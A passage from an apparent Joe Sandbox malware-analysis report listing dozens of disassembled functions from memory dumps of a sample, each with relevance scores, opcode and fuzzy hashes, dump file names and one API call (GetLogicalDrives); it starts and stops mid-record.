                                                            • Instruction ID: 27a35ec4cabeebcba7d73af9dab8495767df4eb380fc9839d2c5e1348b0a1e19
                                                            • Opcode Fuzzy Hash: 67ff2448c7ee2d7a107e879ce5ae87ccbca878de490dd96dce0aa4fa4a4252eb
                                                            • Instruction Fuzzy Hash: 670126EFA44222AD769269753B185FB6B7DE4C3330334A83AF043C6D8AE6D469099131
                                                            Function 06DA08AF Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: bf8b81e8c3245ad9addff7bba211b2a2400f9d124941de48ffb4bab921cbdd4a
                                                            • Instruction ID: ed5a9c41801a0fe108ef15aef8ecc0070d873ceb0efad4322e06258e6492cd07
                                                            • Opcode Fuzzy Hash: bf8b81e8c3245ad9addff7bba211b2a2400f9d124941de48ffb4bab921cbdd4a
                                                            • Instruction Fuzzy Hash: 206123F750C311EEB7C295805B40AFA6B7EAB9B33CB308526F4C795502E294CB4A81F1
                                                            Function 06DB0D47 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: a709f11250961d3664bec4c92f54614f9701699763e87ed5724c68e80014286e
                                                            • Instruction ID: fadbd91810ea6abe5a788c3aaa5642f9443bdc2f019e539f3929d92b512e0003
                                                            • Opcode Fuzzy Hash: a709f11250961d3664bec4c92f54614f9701699763e87ed5724c68e80014286e
                                                            • Instruction Fuzzy Hash: E90126EB908252ADB39255712E145FB6B7EE4C3230334953AF053C698BE694560E5231
                                                            Function 06DA08CA Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 24906413f292287cf1d4a867db7112c30f519ef9b274d826893eecd3026dbb78
                                                            • Instruction ID: addb29c5dcc03230797d0e17e8ee65583cc994ece5ace8fb8c19837db196b304
                                                            • Opcode Fuzzy Hash: 24906413f292287cf1d4a867db7112c30f519ef9b274d826893eecd3026dbb78
                                                            • Instruction Fuzzy Hash: CF5126F740C311FDB7C295855780AFA6B7EAA9B33D7308526F4C7A5602E294CB4681F1
                                                            Function 06DA0953 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: bb5fbebffcf3c069266c8b5fe831ac22c35a20cbd62fbb32bcd13e46b934b6b4
                                                            • Instruction ID: 01712ea3689cc3513804b4ac03b2a6bc440255295893031b92d941ffa04c682a
                                                            • Opcode Fuzzy Hash: bb5fbebffcf3c069266c8b5fe831ac22c35a20cbd62fbb32bcd13e46b934b6b4
                                                            • Instruction Fuzzy Hash: 9F51F1B744C311EDB7C195815740AFA677EAAAB33CB308522F4CBA6602E294CA4651F1
                                                            Function 06DA0942 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 5f11d6490213557b7bc044b86f16ce401dbe43e192458751f606c1abb65df872
                                                            • Instruction ID: 5a3edecef19a8cce9f8d0f56a344f44c754f797bbe8847b83defe4ee4753a319
                                                            • Opcode Fuzzy Hash: 5f11d6490213557b7bc044b86f16ce401dbe43e192458751f606c1abb65df872
                                                            • Instruction Fuzzy Hash: CB51E5F744C311FDB7C295815750AFA677EAA9B33CB308512F4CBA5A01E294CB4551F1
                                                            Function 06DA099A Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: c336644e74653872a070068293f62dabefb2230af66022d3461d1966a553d945
                                                            • Instruction ID: 9045beb32522b0310deba611f6155c0f02858745c0c3d80b4d776584a0426e84
                                                            • Opcode Fuzzy Hash: c336644e74653872a070068293f62dabefb2230af66022d3461d1966a553d945
                                                            • Instruction Fuzzy Hash: 5051E1F754D311FDB7C295815B40AFA677EAA9B33C7308522F4CBA5A02E294CB4A41F1
                                                            Function 06DA09FD Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 07dfafd9f6ef2be30d99a8861e8fb94ea83d851ac1481d99dfb4d120faab65b2
                                                            • Instruction ID: 372ccdf4fa8d64e0a022593b0b5d931bae658f9593de1d3b017ecdbcf5017223
                                                            • Opcode Fuzzy Hash: 07dfafd9f6ef2be30d99a8861e8fb94ea83d851ac1481d99dfb4d120faab65b2
                                                            • Instruction Fuzzy Hash: 4F5102F754D311EDB7C295805B50AFA6B7EEA9A33C7308522F4CBD5902E294CB4A81F1
                                                            Function 06DA09B8 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 2424c2064076ad3591180350ed6537c13e406cc64ecb8c1ab8bdc4c087085ddd
                                                            • Instruction ID: f5edcb87670e0f0fbb8604e65608800a81e1d766bbacca3403943c30a8723976
                                                            • Opcode Fuzzy Hash: 2424c2064076ad3591180350ed6537c13e406cc64ecb8c1ab8bdc4c087085ddd
                                                            • Instruction Fuzzy Hash: B451D0F754C311FDB7C295805B40AFA6B7EAA9A33C7308522F4C7A5A02E294CB4A41F1
                                                            Function 06DA09D2 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: ba314f95272ebbc59ee95d8db6eb5cd4531e07b4bffc16b2a1c79c256ca75e24
                                                            • Instruction ID: ff10c46c3f8aaf066ba5523e66f8562bf96b32eed8ef2bdf6c811ea4e7d9dbae
                                                            • Opcode Fuzzy Hash: ba314f95272ebbc59ee95d8db6eb5cd4531e07b4bffc16b2a1c79c256ca75e24
                                                            • Instruction Fuzzy Hash: B141E0F754C311FDB7C295855B40AFA6B7EEA9A23C7308522F4CBA5902E294CB4A41F1
                                                            Function 06DA0A54 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 62aafe2083a5010515d3bcc2fbc724f455ffb82006e23fcdde1539d68cd6bab8
                                                            • Instruction ID: bf303068058f94f16bc4aec8b832033a771db45cfe9d6e10661132981b2a4037
                                                            • Opcode Fuzzy Hash: 62aafe2083a5010515d3bcc2fbc724f455ffb82006e23fcdde1539d68cd6bab8
                                                            • Instruction Fuzzy Hash: 354126F354C311FDB7C295854780AFA677FAA9B23C7304515F4C7A6A02E254CA4691F1
                                                            Function 06DA0A17 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: f4ca49cd6b89c680027aaa9fcb65d4e8da701a19b9f2860195c0b91d2c25ac74
                                                            • Instruction ID: e99a764bfba044ef8fe9d7d34eed7a2e6d90c4242cd7f2fd1d1b5bd880868f58
                                                            • Opcode Fuzzy Hash: f4ca49cd6b89c680027aaa9fcb65d4e8da701a19b9f2860195c0b91d2c25ac74
                                                            • Instruction Fuzzy Hash: 4B4115F750D311FDB7C295805780AFA6B7FAA9B23C7304512F4CBA5A02E298CB4641F1
                                                            Function 06DA0A66 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: f86e754c173bb47797441baad110d35717abc8d7d25dab214060ecd66e4d00fb
                                                            • Instruction ID: 2f91c260e64009981fd569690782f095390a33d06332c895486f8c28a8128fee
                                                            • Opcode Fuzzy Hash: f86e754c173bb47797441baad110d35717abc8d7d25dab214060ecd66e4d00fb
                                                            • Instruction Fuzzy Hash: E841E5F344D310FDB7C295844750AFA677EEA9B23D7304515F4C7A6A02E294DB4581F1
                                                            Function 06DA0A39 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 31bbcc25158eb006f00cc5f854eb09f5fb498d8db592773477ed2a721e341884
                                                            • Instruction ID: f6df2b2d0e2b5dc115d195ed507e848b087bb63438f6effbde546f45c9ab29b5
                                                            • Opcode Fuzzy Hash: 31bbcc25158eb006f00cc5f854eb09f5fb498d8db592773477ed2a721e341884
                                                            • Instruction Fuzzy Hash: F74115F350C311FDB7C295854780AFA677FAA9B23C7304525F4C7A6A02E394DA4651F1
                                                            Function 06DA0A29 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 714737c076105d1f989d309eb3f3cb35351c2a8c5ff78b4edcbdf1153664604d
                                                            • Instruction ID: 38f6403494837427c70eff1de330e8a70c2b50e7dab51f66e4d1350054bbae6c
                                                            • Opcode Fuzzy Hash: 714737c076105d1f989d309eb3f3cb35351c2a8c5ff78b4edcbdf1153664604d
                                                            • Instruction Fuzzy Hash: F74125F750C310FDB7C295805780AFA6B7FAA9B23C7304522F4CBA5A02E294CA4681F1
                                                            Function 06DA0A8D Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 4013089645754b58adad64bd4a6dd97c1637f79387e5970a714513af9717a63f
                                                            • Instruction ID: 332c4b925dc4262737ea7c5afd8d769a9cdfef4b32c22cadff7fe3eb9bc7de51
                                                            • Opcode Fuzzy Hash: 4013089645754b58adad64bd4a6dd97c1637f79387e5970a714513af9717a63f
                                                            • Instruction Fuzzy Hash: 814102F354C310FDB7D295844780AFA677EEA9B23C7304512F4CBA5A02E394CA4691F1
                                                            Function 06DA0A7E Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 94eacee461c55659a28f501f534a39615a8dc96ebfdc930758875ccec9b7f0a1
                                                            • Instruction ID: c5ef815a92f01ba430acd628f92321895e0c44e13a949eada8e8743458814941
                                                            • Opcode Fuzzy Hash: 94eacee461c55659a28f501f534a39615a8dc96ebfdc930758875ccec9b7f0a1
                                                            • Instruction Fuzzy Hash: F84115F340C311FDB7C295844780AFA6B7EAA9B23C7304512F4C7A5A01E294CB4651F1
                                                            Function 06DA0AA3 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: bc17baf729545296b8548de5ec1b939ad5e9f92a136ed5b4490669db29b7728e
                                                            • Instruction ID: bcd2bc76da8b88506c3dedad3b70fceaed4d0107ea0b4e28463975d5b797a8d3
                                                            • Opcode Fuzzy Hash: bc17baf729545296b8548de5ec1b939ad5e9f92a136ed5b4490669db29b7728e
                                                            • Instruction Fuzzy Hash: A741E4F754C314FD77C295844740AFA6B7EAA9B23C7308526F887A6A02E294CA4651F1
                                                            Function 06DA0A71 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 3d3eaca9ffbdf64c63dde3be9c308bb11c56f5e317d18caff7416be4f29d4e34
                                                            • Instruction ID: ca4c45a36b3abc37af3c31cc5f8e85cd63ced55a14fb0861b4583e3b003d002e
                                                            • Opcode Fuzzy Hash: 3d3eaca9ffbdf64c63dde3be9c308bb11c56f5e317d18caff7416be4f29d4e34
                                                            • Instruction Fuzzy Hash: 4D4103F344C310FDB7C295844780AFA677EEA9B23C7308512F4CBA6A02E294DA4651F1
                                                            Function 06DA0B2B Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 42ae7c0b75a711202308cefdac064ef509f36995669f7d8a6feb8c5b33956574
                                                            • Instruction ID: 8b5271a3d82c73aecd82a3c79b32d5206f475e588d5da2b17eb59b22f9e324f9
                                                            • Opcode Fuzzy Hash: 42ae7c0b75a711202308cefdac064ef509f36995669f7d8a6feb8c5b33956574
                                                            • Instruction Fuzzy Hash: F64125F340D310EDB7C295844B40AFA2B7EEA9B23C7308515F4C7E6902E254DB4582F1
                                                            Function 06DA0AD5 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 72b0a5ce783df9bfec7df20ee54f27d2b69f4b24d632541554032e580974d104
                                                            • Instruction ID: 3b7607efc32179f1e57b1fc3c8c13460d2371829b4c5208d3448e4981755ed1a
                                                            • Opcode Fuzzy Hash: 72b0a5ce783df9bfec7df20ee54f27d2b69f4b24d632541554032e580974d104
                                                            • Instruction Fuzzy Hash: 6D41E5F350C311EDBBD195854740AFA677EEA9B23C7304516E4C7A6A02E294DB4A42F1
                                                            Function 06DA0B46 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 522a3a4d82a62d34ed913509b94be9de329ce2baed8e4894e47ad62072cd691f
                                                            • Instruction ID: 59c53c9bf321e6106be56b2ea008695bd0ae4a1fd236605c561f6b246400f3f1
                                                            • Opcode Fuzzy Hash: 522a3a4d82a62d34ed913509b94be9de329ce2baed8e4894e47ad62072cd691f
                                                            • Instruction Fuzzy Hash: 8D3126B354D324EEBB8295414B80AFA673EA9DB23C3304525E887A6902D254DB4A82F1
                                                            Function 06DA0B1A Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 811fe09201989c75f10dc1775cdff9ec00b812121b4067597ca407d830bd2f86
                                                            • Instruction ID: bc823645fa16bff37db5b80c16bd279105270ff7d21229b812c684b3013b2133
                                                            • Opcode Fuzzy Hash: 811fe09201989c75f10dc1775cdff9ec00b812121b4067597ca407d830bd2f86
                                                            • Instruction Fuzzy Hash: AB31F4F344D314FDBBC295454B80AFA277EA69A23C7304515F8CBA6A02E364DB4981F1
                                                            Function 06DA0B74 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 24e3ccf849159f219989202e24a73b30987585f48fac91dad60f250ad56e806a
                                                            • Instruction ID: 75a4d1db4093d4ce26b69b159a34fa5ba0fe95a820129b532931d25977dca929
                                                            • Opcode Fuzzy Hash: 24e3ccf849159f219989202e24a73b30987585f48fac91dad60f250ad56e806a
                                                            • Instruction Fuzzy Hash: 2A3138B344D310EEBBD2964447806FA777EAADB23C7304525F887E6902E354DB4941F1
                                                            Function 06DA0B9F Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 12c12fe8cc4a70c20fb8785a08b7a68de975d044894108c36976865e816e7109
                                                            • Instruction ID: 27fc02fc566b8e5ca41aec0df7c144cf62a22507e9e6c777e516cecca4760714
                                                            • Opcode Fuzzy Hash: 12c12fe8cc4a70c20fb8785a08b7a68de975d044894108c36976865e816e7109
                                                            • Instruction Fuzzy Hash: 863128F744D311FDB782954147505FA2B7EEAEB3383308515F887D6902E265DB4541F1
                                                            Function 06DA0BE6 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 7c9a3c00b7741df712bff26c595e0618a74e12f853f44216155319d5bcc5f0a1
                                                            • Instruction ID: ede86c729b26bf7c419d935c9aa7e67e04239584c8ac00affe13ff67f7e98b36
                                                            • Opcode Fuzzy Hash: 7c9a3c00b7741df712bff26c595e0618a74e12f853f44216155319d5bcc5f0a1
                                                            • Instruction Fuzzy Hash: 72316CF750D314FDBBD292540B806FA3B3AE9DB2383344466E8C7DA902D2559B4A82F1
                                                            Function 06DA0BFF Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 35edf92e29c01db67be477819a44e3141b6562e28b1963527bb6c86e9cd0e972
                                                            • Instruction ID: c3b2f9b7960aa00dcbd0cafb244e53690e14f868568c59bd0213683fa139a2ab
                                                            • Opcode Fuzzy Hash: 35edf92e29c01db67be477819a44e3141b6562e28b1963527bb6c86e9cd0e972
                                                            • Instruction Fuzzy Hash: 8631E4F344C311EDBBD295414780AFA6B7EE6DA23C7308525F88BA6A02E365DB4641F1
                                                            Function 06DA0C1D Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: fc97061c0e21deb16fd7f0c85d7ab97560325737009edce592475407f2adfd03
                                                            • Instruction ID: 393b7c2cc518ccfc69b1e371905e15d8f6b254d555d789fba79ca46df134d9e9
                                                            • Opcode Fuzzy Hash: fc97061c0e21deb16fd7f0c85d7ab97560325737009edce592475407f2adfd03
                                                            • Instruction Fuzzy Hash: 1D2105F754C310BD7BC291454B90AFA2B3EEADA6383308515F88BA6A01E265DB4551F1
                                                            Function 06DA0B94 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 55866a4e547337b00850064b6a5e17c2b1edb7e356e272705fc0de2f02ee5a7c
                                                            • Instruction ID: 5e51d26cd13050b3549128eb7b91f06d44e8f8274775d9a679c2b6d9d98f7432
                                                            • Opcode Fuzzy Hash: 55866a4e547337b00850064b6a5e17c2b1edb7e356e272705fc0de2f02ee5a7c
                                                            • Instruction Fuzzy Hash: 3D21E3F344D311FD7BD295454B80AFA273EA6DA23C3308515F88BA6902E255DB4541F1
                                                            Function 06DA0BC2 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: cea61bc613df947479a40bf58ce14cd723771776e13d65614ec6ef045e38317e
                                                            • Instruction ID: a9a4c640ec37815a39ba6c4cf89c184ee6a8da4ec09653e4a5dff2b3dd2fd67f
                                                            • Opcode Fuzzy Hash: cea61bc613df947479a40bf58ce14cd723771776e13d65614ec6ef045e38317e
                                                            • Instruction Fuzzy Hash: FC2136F300C310FD7B8291454B906FA273EA6DA3383308425F88BE6A02E2A4DB4541F1
                                                            Function 06DA0BD2 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 1da380caf5b8725b2480149ff4452fc26e3baeb90d51e634a1a869277ff6d14a
                                                            • Instruction ID: 577dc2d7f5b49d93242b7c246df8428845feec719ee73277050f2a814e84e05a
